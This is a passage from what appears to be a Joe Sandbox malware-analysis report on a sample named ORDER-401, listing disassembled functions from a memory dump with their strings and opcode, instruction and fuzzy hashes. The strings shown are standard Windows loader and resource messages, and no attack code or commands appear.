                                                                    • Instruction Fuzzy Hash: A811E4323641029FD759CA28C891F7EB7A5FF80725F19851AF806CF291E734D841C751
                                                                    Function 015C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 015C20F3
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015C2104
                                                                    • LdrpInitializationFailure, xrefs: 015C20FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    • Opcode ID: a641184206160ffb7814383a8c2ee5d184c73c81861a951d87f6b75649994206
                                                                    • Instruction ID: 806c04577605a60bc3c20c74e9af2f36dee29fc2f2b7c0857243551742bbef93
                                                                    • Opcode Fuzzy Hash: a641184206160ffb7814383a8c2ee5d184c73c81861a951d87f6b75649994206
                                                                    • Instruction Fuzzy Hash: 1AF0C239A40319AFE724EA8DCC56FAA3B68FB81F54F50006DFA007F6C5D2F0A950C691
                                                                    Function 015503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    • Opcode ID: 07e459a7a66d58abe14c0a0c6759bc38e4abd7f6f8a0e63e6e06ef1186e193c3
                                                                    • Instruction ID: 4ed8e61426d32137649801c0ebac6c514b31138acfdf55840c855508d4cb715d
                                                                    • Opcode Fuzzy Hash: 07e459a7a66d58abe14c0a0c6759bc38e4abd7f6f8a0e63e6e06ef1186e193c3
                                                                    • Instruction Fuzzy Hash: C7715C71A0014ADFDB41DFE8C990BAEBBF8BF48744F144065E905EB291EA74ED01CBA1
                                                                    Function 0154A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrResSearchResource Enter, xrefs: 0154AA13
                                                                    • LdrResSearchResource Exit, xrefs: 0154AA25
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    • API String ID: 0-4066393604
                                                                    • Opcode ID: 43e0f2c0fe9879b363e4580dfb9f3260fa105ce41fb567b2372279c639ee4369
                                                                    • Instruction ID: 62884172550538e566f6f072f07225b894c4c4355e98f31cce4258796c168ab8
                                                                    • Opcode Fuzzy Hash: 43e0f2c0fe9879b363e4580dfb9f3260fa105ce41fb567b2372279c639ee4369
                                                                    • Instruction Fuzzy Hash: 60E19471E802199FEB62CF99C980BAEBBB9FF44358F14442AE912EF251D774D940CB50
                                                                    Function 0160A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: ab032dab2c50b7035bf98dbc86eb96c173b81c0424f224f5fd8c87afaf149914
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: 0AC1AF312143429BE72ACE68CC41B6BBBE5BFC4394F088A2DF6968B2D1D775D505CB41
                                                                    Function 015BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 1622ad545b0a95096bf734a4d5efbfc6d8b1bdc72a38df4f2bc5487494acfa79
                                                                    • Instruction ID: 05c597ec9de2910d9f1e3560f8f37793e90feb77a108e408244b50991c7aa297
                                                                    • Opcode Fuzzy Hash: 1622ad545b0a95096bf734a4d5efbfc6d8b1bdc72a38df4f2bc5487494acfa79
                                                                    • Instruction Fuzzy Hash: F5613B71E006199FDB15DFA88881BEEBBF5FB48700F18846DE659EF291D731A901CB50
                                                                    Function 015E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    • API String ID: 0-17815947
                                                                    • Opcode ID: 5a3122afc3f8b8165fcf8b8db265979e72c83d2ae928cfe6cbe93e4ef9e90da2
                                                                    • Instruction ID: d9ae1be6b0adbda4c4ae02594b0c96fd4be24042ec4f73d28087c6a36046628f
                                                                    • Opcode Fuzzy Hash: 5a3122afc3f8b8165fcf8b8db265979e72c83d2ae928cfe6cbe93e4ef9e90da2
                                                                    • Instruction Fuzzy Hash: 0A510871E0021EAFDB15DFA9CC94AEEBBF8BB44754F10052AE611FB290D6309905CB60
                                                                    Function 015404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • kLsE, xrefs: 01540540
                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0154063D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                    • API String ID: 0-2547482624
                                                                    • Opcode ID: b4a7e1fc26a230b33d508822430e67c8c643f2f4a9146cb683143ebd6aff3f88
                                                                    • Instruction ID: 721ec71743dae3111a6ec79c87cf5805df10ff8c13d2d202e3989278b024c282
                                                                    • Opcode Fuzzy Hash: b4a7e1fc26a230b33d508822430e67c8c643f2f4a9146cb683143ebd6aff3f88
                                                                    • Instruction Fuzzy Hash: 7951AE715047429BD725EF68C4406EBBBE8BF85308F20483EFADA8B281E770D545CB92
                                                                    Function 0154A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0154A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0154A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: 6c753e64fb6f2235f8682b9d1fd002a38ec77964766a7699201700ba7a25aebf
                                                                    • Instruction ID: ff55caf084fcd7e651adc409d14e50aa18fe03af36d175dc44844bf41c880faa
                                                                    • Opcode Fuzzy Hash: 6c753e64fb6f2235f8682b9d1fd002a38ec77964766a7699201700ba7a25aebf
                                                                    • Instruction Fuzzy Hash: FE41AD31A8464ADBEB21CF69C840B6E7BF4FF85704F1444A9E906DF295E3B5D940CB50
                                                                    Function 0157A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Cleanup Group$Threadpool!
                                                                    • API String ID: 2994545307-4008356553
                                                                    • Opcode ID: db54c92b4ecd81d141b059de370831bd854d491c52040d103d0a4c556e43ce45
                                                                    • Instruction ID: b797df667d95bc283b69a75473ae309468a0bf939281b02319ac65152c101da7
                                                                    • Opcode Fuzzy Hash: db54c92b4ecd81d141b059de370831bd854d491c52040d103d0a4c556e43ce45
                                                                    • Instruction Fuzzy Hash: A201D1B2654700AFE312DF24DD46B1A7BE8F785715F048939A648CB190E374D904CB46
                                                                    Function 0154C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    • API String ID: 0-1339004836
                                                                    • Opcode ID: 3d07be1505f73e3826a754867157f5addc7574b41cc77e22e41a81ba2ff7d78c
                                                                    • Instruction ID: b3a3334ba1e617be53469395ce5e4b94e3a63cef6908d93915bc1f7c2c8e2477
                                                                    • Opcode Fuzzy Hash: 3d07be1505f73e3826a754867157f5addc7574b41cc77e22e41a81ba2ff7d78c
                                                                    • Instruction Fuzzy Hash: D6827B75E012199FEB25CFA9C880BEDBBB1BF88318F14816AE959AF350D7709941CF50
                                                                    Function 015C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: fd1581be924f92bc3ff09dbb03b232037a01be87a3b248bb0acc730b95d5bc41
                                                                    • Instruction ID: fd972db34ccf6f4687eef2a29e4d933e2c8c6bcd933962c9c8891ce21cbd6815
                                                                    • Opcode Fuzzy Hash: fd1581be924f92bc3ff09dbb03b232037a01be87a3b248bb0acc730b95d5bc41
                                                                    • Instruction Fuzzy Hash: 8C915271A0021AAFEB21DF95CD85FAE7BB8FF54B50F100059F605AF291D774AA00CBA0
                                                                    Function 015EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 35cc0b47742f2a71084116e7739a300e592318d0c1959765a33f3132b5d1f528
                                                                    • Instruction ID: 87ecbf50aa53f26734c4c5486f31c033aa448021a110d63180cd196abf579d05
                                                                    • Opcode Fuzzy Hash: 35cc0b47742f2a71084116e7739a300e592318d0c1959765a33f3132b5d1f528
                                                                    • Instruction Fuzzy Hash: 5891A031D1060AAEDB2AAFA4DC59FAFBBB9FF85740F140015F505AF250E774A901CB90
                                                                    Function 0157A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalTags
                                                                    • API String ID: 0-1106856819
                                                                    • Opcode ID: 8b58435bd7de1c477b70dd21a54b7e6378c078d8b04ab287f5d668058f3064fe
                                                                    • Instruction ID: d7012671a8ca051058e3b251c0340aa81a168ba9ff9687986c7cd58d2a5607ba
                                                                    • Opcode Fuzzy Hash: 8b58435bd7de1c477b70dd21a54b7e6378c078d8b04ab287f5d668058f3064fe
                                                                    • Instruction Fuzzy Hash: 5A714AB5E0021A9FDF28CF9CD590AEDBBF2BF98710F14852AE905AB241E7319941CB50
                                                                    Function 015E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .mui
                                                                    • API String ID: 0-1199573805
                                                                    • Opcode ID: 0f4754e21fdbd33e7cd61fa7874755bd79f15418885dcf0b6742692777b120a6
                                                                    • Instruction ID: d8c28777634e9ddeccd49f7067b0a603637caae31de52de57ffe47faaadd7adc
                                                                    • Opcode Fuzzy Hash: 0f4754e21fdbd33e7cd61fa7874755bd79f15418885dcf0b6742692777b120a6
                                                                    • Instruction Fuzzy Hash: 8E518372D0022A9BDF19DF99D848AAEBBF9BF44614F05412AEA11FF340D7749801CBE4
                                                                    Function 0155E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EXT-
                                                                    • API String ID: 0-1948896318
                                                                    • Opcode ID: a6cea4b46f651428adca83b2061313fee0ae5adc6008b63ae2f8f563b95745ee
                                                                    • Instruction ID: a588ddd66a6f3b0b71b0ce63b55397f226fc459ae26b4410c60ac72121725a00
                                                                    • Opcode Fuzzy Hash: a6cea4b46f651428adca83b2061313fee0ae5adc6008b63ae2f8f563b95745ee
                                                                    • Instruction Fuzzy Hash: 8E41AE725183429BD751DA75C891B6FFBE8FF88704F04092EBA84EF180E674DA04C7A6
                                                                    Function 015BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: 5e497a1f76465f79277feb1cd978c90c1560b2d679016214720231d4ae77b27a
                                                                    • Instruction ID: fcfa84c0bc22625d18baadee0668a13ce8da0714878f8f17a8a1f80a5608e49a
                                                                    • Opcode Fuzzy Hash: 5e497a1f76465f79277feb1cd978c90c1560b2d679016214720231d4ae77b27a
                                                                    • Instruction Fuzzy Hash: 134121B1D0152EABDB21DA50CC85FDEB77CBB95714F0045A5AA08AF140DB709E898FA8
                                                                    Function 015D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 75e40d488204210947217fda4bb96896b00bba4a817cd4920153bbead492cc33
                                                                    • Instruction ID: a4a1c1b9ac36835169cf7fbee9ac007ad79afe735312689f2f7ff46cf50a2231
                                                                    • Opcode Fuzzy Hash: 75e40d488204210947217fda4bb96896b00bba4a817cd4920153bbead492cc33
                                                                    • Instruction Fuzzy Hash: 4B310631A0075A9BEB32DF6DC854BEE7BA8FF44704F144069E941AF292D775E806CB50
                                                                    Function 015BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: 6f6236056cf7b6db10ab33c4b7174613ebbb586c5d17be832433f38ee93708a6
                                                                    • Instruction ID: 125e1e30e18fd4e00e9e11e858ffca0f5b5ce0475489e5e282795cb030b3d30d
                                                                    • Opcode Fuzzy Hash: 6f6236056cf7b6db10ab33c4b7174613ebbb586c5d17be832433f38ee93708a6
                                                                    • Instruction Fuzzy Hash: AF31253690051AAFEB16DB58C891EAFBBB4FF80720F114169E905AF250D7309E00DBE4
                                                                    Function 015C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015C895E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                    • API String ID: 0-702105204
                                                                    • Opcode ID: e58444169647daff9b34f3d465fba1c784b970710f1d4fe4de4640ab2734338e
                                                                    • Instruction ID: 5907add9b22c6ec548a43ade70c69721d92cc5281f228ed93ef871425e11956e
                                                                    • Opcode Fuzzy Hash: e58444169647daff9b34f3d465fba1c784b970710f1d4fe4de4640ab2734338e
                                                                    • Instruction Fuzzy Hash: A9012632310202AFE724AFD9CC84ADA7BA5FFC1B95B04142CF6431F561CB20A840C7A6
                                                                    Function 015E2000 Relevance: .8, Instructions: 757COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78ae1b5f6092b8ddc3e9d56ec3769bd3be869cbf451a8d37490799008af7ced2
                                                                    • Instruction ID: 4c54bb4a24c0fff12d06d879d6a190650d411207e2e574358bc123d5ee9e6ac2
                                                                    • Opcode Fuzzy Hash: 78ae1b5f6092b8ddc3e9d56ec3769bd3be869cbf451a8d37490799008af7ced2
                                                                    • Instruction Fuzzy Hash: F942B672A083419BD719CF68C894A6FBBE9BFC8340F08492DFA869F254D770D945CB52
                                                                    Function 015D8158 Relevance: .6, Instructions: 617COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97686f8a531ceee47574253a3eb3a9842787779b78fe373263183c77c76a6acf
                                                                    • Instruction ID: 195ee7aa80baf9a77db6cd611e41cefdb6f83feeb3b24821857324d5ce5292f3
                                                                    • Opcode Fuzzy Hash: 97686f8a531ceee47574253a3eb3a9842787779b78fe373263183c77c76a6acf
                                                                    • Instruction Fuzzy Hash: 2F425C75E102198FEB25CF69CC81BADBBF5BF88310F158099E949EB242DB349985CF50
                                                                    Function 01552840 Relevance: .6, Instructions: 605COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43039c024ee90cbb2898dc5e334f90fc6f9f840ef62de4b28691a238484657f3
                                                                    • Instruction ID: 3a8ce33bef55e91afd2c7c1f364a60c51e56455e3662dc7df92e22e906eb9577
                                                                    • Opcode Fuzzy Hash: 43039c024ee90cbb2898dc5e334f90fc6f9f840ef62de4b28691a238484657f3
                                                                    • Instruction Fuzzy Hash: 5332DD70A007568FEB25CF69C8547BEBBF2BF84304FA8451ED9869F285D735A842CB50
                                                                    Function 015EA118 Relevance: .6, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a959cb3cb1b54566a3bb685d3b592de675f40258c917f796b0391156c68fc21f
                                                                    • Instruction ID: 9bce1e58aa3de1fc6fcac0f731133af1f485afadc16bee52ccbc6aa4630e2aa9
                                                                    • Opcode Fuzzy Hash: a959cb3cb1b54566a3bb685d3b592de675f40258c917f796b0391156c68fc21f
                                                                    • Instruction Fuzzy Hash: DB22C474A046618BEB2DCF3DC05837ABBF1BF45340F08889AD9968F286E775D451CB60
                                                                    Function 01546A50 Relevance: .5, Instructions: 548COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13b996fd34686076a5cd2381fd72a9434d9cd66f1fb2d024e8436c2580ddda1e
                                                                    • Instruction ID: 6bbb88a7477198c9a5247d28ecf82bb70e18e4510900a9d1be84a13461b81adc
                                                                    • Opcode Fuzzy Hash: 13b996fd34686076a5cd2381fd72a9434d9cd66f1fb2d024e8436c2580ddda1e
                                                                    • Instruction Fuzzy Hash: 1D328B71A00615CFDB25CF69C880BAEBBF1FF49304F14896AE956AB391D734E841CB90
                                                                    Function 01564A35 Relevance: .4, Instructions: 423COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction ID: 21e640ba2519c794ffb8e7c44924fe9b6944ea179cc46ce00bda47dfe3f93f0e
                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction Fuzzy Hash: 96F15C71E0021A9BDF15CFA9D590BAEBBF9BF48710F488129E905AF354E774D841CBA0
                                                                    Function 015D892B Relevance: .4, Instructions: 386COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67e0fd49f681da1a6b333214e819d809874ea7907b755b6ea2b482d64adffeca
                                                                    • Instruction ID: 79fe094534561132156fadf92f414f563c183ae2d47f75eeaee44dc868556500
                                                                    • Opcode Fuzzy Hash: 67e0fd49f681da1a6b333214e819d809874ea7907b755b6ea2b482d64adffeca
                                                                    • Instruction Fuzzy Hash: 74D1F171A0060A8BEF25CF6DC841BFEB7F1BF88314F198169D955AB281E735E905CB60
                                                                    Function 015465D0 Relevance: .4, Instructions: 383COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab4fb06f5c095a10c25b4073012412bf90c1877a88a87154f2903971fc5b5a2a
                                                                    • Instruction ID: 346cdafdb13d284616ded0f11dcb53112520144504b0e857dd62641eebc618a8
                                                                    • Opcode Fuzzy Hash: ab4fb06f5c095a10c25b4073012412bf90c1877a88a87154f2903971fc5b5a2a
                                                                    • Instruction Fuzzy Hash: BCE17F75508342CFC715CF28C490A6EBBE0FF8A318F058A6DE9959B351EB71E905CB92
                                                                    Function 01538397 Relevance: .4, Instructions: 380COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea1e9528827b9cfd11266a2b3b09076dee12984a74b88bb7d671d9779084f245
                                                                    • Instruction ID: 97503fc3e9456d19ecfaeb2dc08a1ca26a6e2ba47907cf74b6d0b8dbbb7904bb
                                                                    • Opcode Fuzzy Hash: ea1e9528827b9cfd11266a2b3b09076dee12984a74b88bb7d671d9779084f245
                                                                    • Instruction Fuzzy Hash: DED1CFB1A002069BDF19DF68D890EBEB7E5BF94204F144629F916DF280E734E954CBA1
                                                                    Function 015C8243 Relevance: .3, Instructions: 322COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                    • Instruction ID: e633bdbb090a0293a5a516d3722bad4bbf913f2a7d43e22b0fa4073b883a5a59
                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                    • Instruction Fuzzy Hash: 8DB16274A00605AFDF24DFD9C944EAFBBBAFF84704F14446EAA429B790DA74E905CB10
                                                                    Function 01550535 Relevance: .3, Instructions: 300COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
